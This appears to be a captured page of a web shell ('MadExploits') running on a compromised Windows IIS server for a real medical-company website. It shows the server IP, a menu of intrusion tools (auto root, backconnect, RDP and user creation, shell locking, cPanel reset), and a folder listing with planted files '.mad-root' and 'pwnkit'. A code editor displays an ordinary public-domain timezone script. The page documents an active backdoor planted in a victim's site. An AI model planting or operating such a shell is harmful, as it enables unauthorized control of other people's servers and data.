Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 18.226.172.230
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
Flot /
examples /
axes-time-zones /
tz /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
africa
44.7
KB
-rw-rw-rw-
antarctica
15.46
KB
-rw-rw-rw-
asia
110.9
KB
-rw-rw-rw-
australasia
67.87
KB
-rw-rw-rw-
backward
3.99
KB
-rw-rw-rw-
etcetera
2.89
KB
-rw-rw-rw-
europe
118.54
KB
-rw-rw-rw-
factory
393
B
-rw-rw-rw-
iso3166.tab
4.22
KB
-rw-rw-rw-
leapseconds
3.11
KB
-rw-rw-rw-
northamerica
132.94
KB
-rw-rw-rw-
pacificnew
1.16
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
solar87
18.85
KB
-rw-rw-rw-
solar88
18.87
KB
-rw-rw-rw-
solar89
19.14
KB
-rw-rw-rw-
southamerica
72.65
KB
-rw-rw-rw-
systemv
1.51
KB
-rw-rw-rw-
yearistype.sh
680
B
-rw-rw-rw-
zone.tab
19.45
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : yearistype.sh
#! /bin/sh : 'This file is in the public domain, so clarified as of' : '2006-07-17 by Arthur David Olson.' case $#-$1 in 2-|2-0*|2-*[!0-9]*) echo "$0: wild year - $1" >&2 exit 1 ;; esac case $#-$2 in 2-even) case $1 in *[24680]) exit 0 ;; *) exit 1 ;; esac ;; 2-nonpres|2-nonuspres) case $1 in *[02468][048]|*[13579][26]) exit 1 ;; *) exit 0 ;; esac ;; 2-odd) case $1 in *[13579]) exit 0 ;; *) exit 1 ;; esac ;; 2-uspres) case $1 in *[02468][048]|*[13579][26]) exit 0 ;; *) exit 1 ;; esac ;; 2-*) echo "$0: wild type - $2" >&2 ;; esac echo "$0: usage is $0 year even|odd|uspres|nonpres|nonuspres" >&2 exit 1
Close